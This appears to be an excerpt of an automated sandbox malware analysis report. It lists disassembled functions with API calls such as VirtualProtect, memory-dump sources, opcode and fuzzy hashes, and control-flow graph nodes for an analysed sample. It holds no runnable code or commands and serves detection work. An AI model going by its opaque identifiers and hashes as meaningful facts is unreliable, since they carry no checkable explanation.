                                                                                                                                                      Function 00412580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000409,00000000,00000000,00000000,?,00000000,?,?,0040EF71), ref: 0041259F
                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040EF71), ref: 004125DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FormatFreeLocalMessage
                                                                                                                                                      • String ID: Error Code: %d
                                                                                                                                                      • API String ID: 1427518018-2830492919
                                                                                                                                                      • Opcode ID: 1d525a71e8cb5eb276d91495dc9543d69531f819657fa8b75fdd5f8205834c02
                                                                                                                                                      • Instruction ID: 08fe6bb4c81252aca13f7875fe807113bfd974ddb72ba397d731f5de95ab752b
                                                                                                                                                      • Opcode Fuzzy Hash: 1d525a71e8cb5eb276d91495dc9543d69531f819657fa8b75fdd5f8205834c02
                                                                                                                                                      • Instruction Fuzzy Hash: 10012B32B00214BBD7305665AC56FDB775DDF85BA4F000167FE09DB280E5B0DE1082E8
                                                                                                                                                      Function 0040DF50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _memcpy_s.LIBCMT ref: 0040DF96
                                                                                                                                                      • _memcpy_s.LIBCMT ref: 0040DFAA
                                                                                                                                                        • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memcpy_s$Exception@8Throw
                                                                                                                                                      • String ID: Core\
                                                                                                                                                      • API String ID: 93487992-2534804690
                                                                                                                                                      • Opcode ID: a8657365fd312069ee0ef6f088e6ad1ec9ad73d0cb6b13340a8482a65472dfbb
                                                                                                                                                      • Instruction ID: 96814e4bfe430db7b348c38a6644ee4befebf0edd7ee54b93e1ec2a703856812
                                                                                                                                                      • Opcode Fuzzy Hash: a8657365fd312069ee0ef6f088e6ad1ec9ad73d0cb6b13340a8482a65472dfbb
                                                                                                                                                      • Instruction Fuzzy Hash: CA01C4317006149FD710DF6ACC84D6AB7E9EF89364B04406AFC0A9B355C675AC408BE4

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:11.4%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:21
                                                                                                                                                      Total number of Limit Nodes:3
                                                                                                                                                      execution_graph 40426 505f5c0 40428 505f5d3 40426->40428 40430 505f678 40428->40430 40431 505f6c0 VirtualProtect 40430->40431 40433 505f65b 40431->40433 40434 9378530 40435 9378545 40434->40435 40437 93788ad 40435->40437 40439 93788b9 40437->40439 40438 937890c 40438->40435 40439->40438 40442 93f2758 40439->40442 40446 93f2748 40439->40446 40445 93f2763 40442->40445 40443 93f2967 40443->40439 40444 93f27ed KiUserExceptionDispatcher 40444->40445 40445->40443 40445->40444 40449 93f2763 40446->40449 40447 93f2967 40447->40439 40448 93f27ed KiUserExceptionDispatcher 40448->40449 40449->40447 40449->40448 40450 505f828 40451 505f868 CloseHandle 40450->40451 40453 505f899 40451->40453

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 0936073F Relevance: 16.1, Strings: 12, Instructions: 1146COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                      • API String ID: 0-3443518476
                                                                                                                                                      • Opcode ID: ba1e63aa09872773f5e19a07ed9ad756d4132cfd4cbeb3264aace792439d70c6
                                                                                                                                                      • Instruction ID: a978617c12304fae967d73819225294855ff92b60d5fa138ad6b28b0ec2b4676
                                                                                                                                                      • Opcode Fuzzy Hash: ba1e63aa09872773f5e19a07ed9ad756d4132cfd4cbeb3264aace792439d70c6
                                                                                                                                                      • Instruction Fuzzy Hash: 84B20834A00218DFDB18DFA9C895BADB7B6BF48700F158599E505AB3A9DB70EC42CF50
                                                                                                                                                      Function 09360A77 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                                                                                                      • API String ID: 0-324474496
                                                                                                                                                      • Opcode ID: 8507f3e97acddaf2d7ad4e14c0ea6395276d9b5e01f63cf8704385c6342c2a3a
                                                                                                                                                      • Instruction ID: db928b667ac6a1f2559ef9334a9e0ce79868555e3b4e7a939b29ca5460b37f30
                                                                                                                                                      • Opcode Fuzzy Hash: 8507f3e97acddaf2d7ad4e14c0ea6395276d9b5e01f63cf8704385c6342c2a3a
                                                                                                                                                      • Instruction Fuzzy Hash: 26220A34A04219CFDB24DFA5C895BADB7B2BF48304F158099E509AB3A5DB71ED82CF50
                                                                                                                                                      Function 093F2748 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 093F27F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047307627.00000000093F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_93f0000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                      • Opcode ID: f7d069d8dc41e410dc9187b1ca59dfed9a19bd57788e2c02221793f3d8e70488
                                                                                                                                                      • Instruction ID: 7336c5f0cceb1865db94246e0c6490ec9c9eed724a8c4af25d4cc4758a62a2d4
                                                                                                                                                      • Opcode Fuzzy Hash: f7d069d8dc41e410dc9187b1ca59dfed9a19bd57788e2c02221793f3d8e70488
                                                                                                                                                      • Instruction Fuzzy Hash: 205161343002408FC7A4EBB9E0A9B7A37D3FB9D621F069569D54ACB391CE385C42CB51
                                                                                                                                                      Function 093F2758 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL ref: 093F27F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047307627.00000000093F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093F0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_93f0000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                      • Opcode ID: e68cb939fbefa3fe2af44cc675277da39e0d07672ae55d16482312c752c02fab
                                                                                                                                                      • Instruction ID: e71f85a4b9a9e7e24a5923ce0973c61496a359186f30b56cd54e4681319a6155
                                                                                                                                                      • Opcode Fuzzy Hash: e68cb939fbefa3fe2af44cc675277da39e0d07672ae55d16482312c752c02fab
                                                                                                                                                      • Instruction Fuzzy Hash: C5516034300240CFC7A4EBB9E099B7A77D3BB9D621F069469D54ACB391CE386C42CB51
                                                                                                                                                      Function 0937258B Relevance: .4, Instructions: 355COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 00e25494d2bafece5aa592ed85064b1a9ff45dd890483271362dc72501d82993
                                                                                                                                                      • Instruction ID: ec0c354ece6419b93691f77ec6da86a12d51029635763aee1668a9e1cabba90e
                                                                                                                                                      • Opcode Fuzzy Hash: 00e25494d2bafece5aa592ed85064b1a9ff45dd890483271362dc72501d82993
                                                                                                                                                      • Instruction Fuzzy Hash: 05F1F974A04219CFCB65DF28C884AA9B7F6FF88300F558599D91A9B351DB34ED82CF90
                                                                                                                                                      Function 09378521 Relevance: .2, Instructions: 205COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fe13b3a5a24d339c73d1448171b36d547319e9f7bac3c72bd6efe96bd49f7ac6
                                                                                                                                                      • Instruction ID: c0104a796b10a347782bb1437f8f328fea47c4b1bb6cb64e6a447cabcc188ecb
                                                                                                                                                      • Opcode Fuzzy Hash: fe13b3a5a24d339c73d1448171b36d547319e9f7bac3c72bd6efe96bd49f7ac6
                                                                                                                                                      • Instruction Fuzzy Hash: 56715E30704348CFD724AB66E58D76EB7BAEF84356F018569E40A87A90DB7C9C46CF41
                                                                                                                                                      Function 0A283DB8 Relevance: 7.9, Strings: 6, Instructions: 375COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 632 a283db8-a283dc5 633 a283e3b-a283ed7 632->633 634 a283dc7-a283dcc 632->634 655 a283ed9-a283ee5 633->655 656 a283ee7-a283ef0 633->656 635 a283dda-a283de1 634->635 636 a283dce-a283dd2 634->636 638 a283de7-a283e08 635->638 715 a283dd5 call a283db8 636->715 716 a283dd5 call a284108 636->716 717 a283dd5 call a2840cb 636->717 718 a283dd5 call a283da7 636->718 644 a283e0a-a283e2c 638->644 645 a283e31-a283e38 638->645 639 a283dd8 639->638 644->645 660 a283f10-a283f36 655->660 657 a283eff-a283f0c 656->657 658 a283ef2-a283ef5 656->658 657->660 658->657 662 a283f38-a283f4d 660->662 663 a283f4f-a283f58 660->663 667 a283f81-a283f9c 662->667 664 a283f5a-a283f5d 663->664 665 a283f67-a283f7d 663->665 664->665 665->667 668 a283f9e 667->668 669 a283fa4-a283fa6 667->669 670 a283fa8 668->670 671 a283fa0-a283fa2 668->671 672 a283fad-a283faf 669->672 670->672 671->669 671->670 673 a28415e-a284235 672->673 674 a283fb5-a283fbf 672->674 696 a28423e-a284249 673->696 697 a284237-a28423d 673->697 675 a283fde-a28401d 674->675 676 a283fc1-a283fd6 674->676 681 a2840f0-a284106 675->681 682 a284023-a284095 675->682 676->675 681->673 700 a28409b-a2840ea 682->700 698 a28427b-a2842d2 696->698 699 a28424b-a2842a1 696->699 697->696 707 a2842ab-a2842af 699->707 708 a2842a3 699->708 700->681 700->682 711 a2842bf 707->711 712 a2842b1-a2842b5 707->712 708->707 714 a2842c0 711->714 712->711 713 a2842b7 712->713 713->711 714->714 715->639 716->639 717->639 718->639
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$4c]q$4c]q$4c]q$4c]q$Haq
                                                                                                                                                      • API String ID: 0-535247161
                                                                                                                                                      • Opcode ID: 06789dce253e44931f70b17e748451712ee5bd67743a0cb26deb8eb6864ad6f8
                                                                                                                                                      • Instruction ID: f5575b2c95b33529f06dc4675091945948945e5dd2fe33702d07856423fdc165
                                                                                                                                                      • Opcode Fuzzy Hash: 06789dce253e44931f70b17e748451712ee5bd67743a0cb26deb8eb6864ad6f8
                                                                                                                                                      • Instruction Fuzzy Hash: 64E17075E112099FCB14DFA9C454A9DBBF6FF88310F248569E805AB394DB31AC06CF90
                                                                                                                                                      Function 09367D88 Relevance: 7.7, Strings: 6, Instructions: 151COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 719 9367d88-9367dd4 723 9367f52-9367f8f 719->723 724 9367dda-9367dec 719->724 727 9367dee-9367e3a 724->727 728 9367e3c-9367e85 724->728 744 9367e88-9367ec8 727->744 728->744 749 9367ed2-9367edc 744->749 750 9367eca-9367ed0 744->750 751 9367edf-9367f22 749->751 750->751 758 9367f24-9367f40 751->758 759 9367f48-9367f4f 751->759 758->759
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                                                                                                      • API String ID: 0-463314800
                                                                                                                                                      • Opcode ID: a01cdbe442e2f24629fa0b54803c4a9069d6978b2389de6a48b9ece336ca510c
                                                                                                                                                      • Instruction ID: d3ac80cae25ec02619fde3ef7e9d7743a48ed83b7e2ca6c32b8f485d4fbfa9fe
                                                                                                                                                      • Opcode Fuzzy Hash: a01cdbe442e2f24629fa0b54803c4a9069d6978b2389de6a48b9ece336ca510c
                                                                                                                                                      • Instruction Fuzzy Hash: DF51B470A002069FC749EF6DC8506AFBBE7BFC8304F608828D54A97355DF34AD068BA1
                                                                                                                                                      Function 0A286B62 Relevance: 5.6, Strings: 4, Instructions: 582COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 762 a286b62-a286b69 764 a286b6c-a286b77 762->764 765 a286b75-a286bce call a2851d0 762->765 770 a2870cc-a287104 765->770 771 a286bd4-a286be9 call a2851d0 765->771 788 a28710b-a287143 770->788 771->770 777 a286bef-a286bf3 771->777 778 a286c0a-a286c1a 777->778 779 a286bf5-a286bff call a2830d0 777->779 785 a286c1c-a286c1e 778->785 786 a286c21-a286c3f 778->786 949 a286c01 call a287430 779->949 950 a286c01 call a287600 779->950 951 a286c01 call a287422 779->951 952 a286c01 call a2875b6 779->952 785->786 793 a286dd0-a286e1d 786->793 794 a286c45-a286c5b call a2851d0 call a287978 786->794 787 a286c07 787->778 805 a28714a-a287184 788->805 834 a2871cb-a287203 793->834 835 a286e23-a286e45 793->835 802 a286d9f-a286da3 794->802 803 a286c61-a286c65 794->803 806 a286da9-a286dad 802->806 807 a286c9d-a286ce6 call a282008 802->807 808 a286c76 803->808 809 a286c67-a286c74 803->809 811 a28718c-a2871c4 805->811 806->811 812 a286db3 806->812 825 a286ce8-a286cea 807->825 826 a286cec-a286cee 807->826 813 a286c7b-a286c7d 808->813 809->813 811->834 812->807 813->788 817 a286c83-a286c8d 813->817 817->788 823 a286c93-a286c97 817->823 823->805 823->807 825->826 827 a286cf0 825->827 828 a286cf5-a286cf7 826->828 827->828 832 a286cf9-a286d1e call a282008 call a2821f0 828->832 833 a286d23-a286d46 828->833 832->833 836 a286d48-a286d68 833->836 837 a286d6a-a286d8d 833->837 851 a28720a-a287242 834->851 835->851 852 a286e4b-a286e5e 835->852 836->837 847 a286db8-a286dc0 call a288638 837->847 848 a286d8f-a286d91 837->848 856 a286dc6-a286dcd 847->856 848->847 853 a286d93-a286d9c 848->853 869 a287249-a287275 851->869 860 a286e60-a286e64 852->860 861 a286e85-a286e8b 852->861 862 a286e75 860->862 863 a286e66-a286e73 860->863 865 a28727d-a2872ba 861->865 866 a286e91 861->866 867 a286e7a-a286e7c 862->867 863->867 906 a2872c1-a2872c5 865->906 868 a286e98-a286eb9 866->868 866->869 870 a286f1a-a286f86 866->870 871 a286ebe-a286ecf 866->871 872 a286f97-a286fff 866->872 867->861 875 a286e7e 867->875 892 a287022-a287038 868->892 869->865 918 a286f88 870->918 919 a286f94 870->919 873 a286ee0 871->873 874 a286ed1-a286ede 871->874 916 a28700d 872->916 917 a287001 872->917 880 a286ee5-a286ee9 873->880 874->880 875->861 883 a286eeb-a286ef7 880->883 884 a286f05 880->884 883->884 898 a286ef9-a286f03 883->898 890 a286f0b-a286f15 884->890 890->892 905 a28703e 892->905 892->906 898->890 911 a287368-a2873b2 905->911 912 a287045-a287049 905->912 913 a287337-a287361 905->913 907 a2872d2-a2872fe 906->907 908 a2872c7-a2872cb 906->908 915 a287306-a287330 907->915 914 a2872cd 908->914 908->915 920 a28704b-a287059 call a2817a0 912->920 921 a287085-a2870c9 912->921 913->911 914->911 915->913 916->892 917->916 918->919 919->872 929 a287068-a28706d 920->929 930 a28705b-a287066 920->930 938 a287078-a287080 call a281fc0 929->938 930->938 938->921 949->787 950->787 951->787 952->787
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $Haq$Haq$Haq
                                                                                                                                                      • API String ID: 0-432640594
                                                                                                                                                      • Opcode ID: d7a69dd81f8ebf62a5f03d7a392d72f3a3f717d0e837448a1ff8efc015d93e55
                                                                                                                                                      • Instruction ID: 4d332468152d03a59cc1e8fc7c33582ccdc00a3240da885c0c3b33e7c282eb8b
                                                                                                                                                      • Opcode Fuzzy Hash: d7a69dd81f8ebf62a5f03d7a392d72f3a3f717d0e837448a1ff8efc015d93e55
                                                                                                                                                      • Instruction Fuzzy Hash: BE328D70A11209CFDB58EF68D4546AEBBB2EF84304F108479E916AB3D0DF35AD46CB91
                                                                                                                                                      Function 0A284DC8 Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1043 a284dc8-a284de7 1044 a284e9a-a284ec2 1043->1044 1045 a284ded-a284df0 1043->1045 1046 a284ec8-a284eca 1044->1046 1047 a284ec4-a284ec6 1044->1047 1105 a284df2 call a284db8 1045->1105 1106 a284df2 call a284dc8 1045->1106 1050 a284ed1-a284ed3 1046->1050 1047->1046 1048 a284ecc 1047->1048 1048->1050 1049 a284df8-a284e14 1051 a284e1c-a284e1e 1049->1051 1052 a284e16 1049->1052 1053 a284f0e-a284f32 1050->1053 1054 a284ed5-a284f0c 1050->1054 1057 a284e25-a284e27 1051->1057 1055 a284e18-a284e1a 1052->1055 1056 a284e20 1052->1056 1058 a284f33-a284f52 1053->1058 1054->1058 1055->1051 1055->1056 1056->1057 1059 a284e2d-a284e52 1057->1059 1060 a284fa6-a284ffc 1057->1060 1066 a284f5e-a284f88 1058->1066 1067 a284f54-a284f5c 1058->1067 1061 a284e58-a284e5a 1059->1061 1062 a284e54-a284e56 1059->1062 1083 a28506b-a285076 1060->1083 1084 a284ffe-a285032 1060->1084 1065 a284e61-a284e63 1061->1065 1062->1061 1064 a284e5c 1062->1064 1064->1065 1069 a284e89 1065->1069 1070 a284e65-a284e87 1065->1070 1076 a284f8f-a284fa3 call a283d70 1066->1076 1067->1076 1073 a284e8b-a284e95 1069->1073 1070->1073 1073->1076 1087 a285078-a285082 1083->1087 1088 a285084 1083->1088 1093 a28503b-a285044 1084->1093 1094 a285034-a285039 1084->1094 1089 a285089-a28508b 1087->1089 1088->1089 1091 a28508d-a2850a5 1089->1091 1092 a2850a6-a2850c2 1089->1092 1100 a2850c9-a2850e5 1092->1100 1096 a285053-a28505b 1093->1096 1097 a285046-a285049 1093->1097 1095 a28505e-a28506a 1094->1095 1096->1095 1097->1096 1103 a285103-a285115 1100->1103 1104 a2850e7-a2850f9 1100->1104 1104->1103 1105->1049 1106->1049
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4c]q$4c]q$4c]q$Haq
                                                                                                                                                      • API String ID: 0-1741209197
                                                                                                                                                      • Opcode ID: be819a74af2edef2d4e60a903f533f85d6d84bde36ff5c688b76ed6ab5475a81
                                                                                                                                                      • Instruction ID: 94202ac688e3abbffebad416a4d7492059dca98d16ba9aa8ecd0e7b383014946
                                                                                                                                                      • Opcode Fuzzy Hash: be819a74af2edef2d4e60a903f533f85d6d84bde36ff5c688b76ed6ab5475a81
                                                                                                                                                      • Instruction Fuzzy Hash: D5B1FA71A1120ADFCB14EF78D8505ADB7B2FF89314F148569E809AB390EB31ED46CB91
                                                                                                                                                      Function 0A287430 Relevance: 5.1, Strings: 4, Instructions: 137COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1159 a287430-a287454 1160 a28745d-a287465 1159->1160 1161 a287456-a28745b 1159->1161 1162 a287468-a28746c 1160->1162 1161->1162 1164 a28747d 1162->1164 1165 a28746e-a28747b 1162->1165 1166 a287482-a287484 1164->1166 1165->1166 1167 a28748a-a2874e5 1166->1167 1168 a2875c0-a2875e2 call a287671 call a2878e0 1166->1168 1182 a2874fd-a287501 1167->1182 1183 a2874e7-a2874ed 1167->1183 1175 a2875e8-a2875ea 1168->1175 1177 a2875f3-a2875fc 1175->1177 1186 a287503-a287505 1182->1186 1187 a287507-a287517 1182->1187 1184 a2874ef 1183->1184 1185 a2874f1-a2874f3 1183->1185 1184->1182 1185->1182 1188 a28752f-a287531 1186->1188 1191 a287519-a28751b 1187->1191 1192 a28751d-a28752d 1187->1192 1188->1168 1190 a287537-a28754b 1188->1190 1195 a28754d-a28755d 1190->1195 1196 a28755f-a287564 1190->1196 1191->1188 1192->1188 1195->1196 1196->1168 1197 a287566-a287582 1196->1197 1197->1177
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0o@p$Dq@p$Lj@p$Lj@p
                                                                                                                                                      • API String ID: 0-4286108749
                                                                                                                                                      • Opcode ID: 4a3709db7857bc99d5e3514f6e3d7e58d62bdf2f5036a529298c2362263bcdb1
                                                                                                                                                      • Instruction ID: f49ba37b653c854b9a2fece337a547b5a181b286310128923e4b41dac1dba7a6
                                                                                                                                                      • Opcode Fuzzy Hash: 4a3709db7857bc99d5e3514f6e3d7e58d62bdf2f5036a529298c2362263bcdb1
                                                                                                                                                      • Instruction Fuzzy Hash: 17415B757211119FCB58EB28D894A6DB7F2BF89714B2180B9ED06DB3A0DB75EC018F90
                                                                                                                                                      Function 09366EC0 Relevance: 4.2, Strings: 3, Instructions: 437COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
